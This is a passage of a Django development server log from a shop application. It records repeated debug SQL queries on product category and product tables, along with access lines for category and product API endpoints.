"shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:16:15,918 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:16:15,920 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:16:15,922 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:16:15,925 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:16:15,927 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:16:15,929 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:16:15,932 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:16:15,934 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:16:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:16:17,432 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:16:17,442 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:16:17,448 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:16:17,456 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:16:17,460 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:16:17,465 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 06:16:17] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 06:16:17,471 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:16:17,476 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:16:17,480 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:16:17,484 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:16:17,488 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:16:17,494 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:16:17,498 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:16:17,502 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:16:17,506 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:16:17,511 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:16:17,517 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:16:17,520 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:16:17,525 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:16:17,529 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:16:17,533 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:16:17,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:16:17,543 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:16:17,547 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:16:17,551 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:16:17,555 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:16:17,559 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:16:17,565 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:16:17,569 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:16:17,573 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:16:17,577 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:16:17,581 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:16:17,588 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:16:17,592 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:16:17,596 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:16:17,600 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:16:17,606 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:16:17,611 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:16:17,614 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:16:17,616 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:16:17,618 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:16:17,621 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:16:17,624 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:16:17,629 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:16:17,633 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:16:17,636 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:16:17,638 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:16:17,641 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:16:17] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:16:31,909 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-20 06:16:31,915 utils 4252 140031503103744 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [20/Dec/2019 06:16:31] "GET /api/v1/fire/ HTTP/1.0" 200 482 [20/Dec/2019 06:20:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:21:37,432 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:21:37,442 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:21:37,449 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:21:37,453 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:21:37,458 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:21:37,462 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:21:37,465 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:21:37,469 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:21:37,473 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 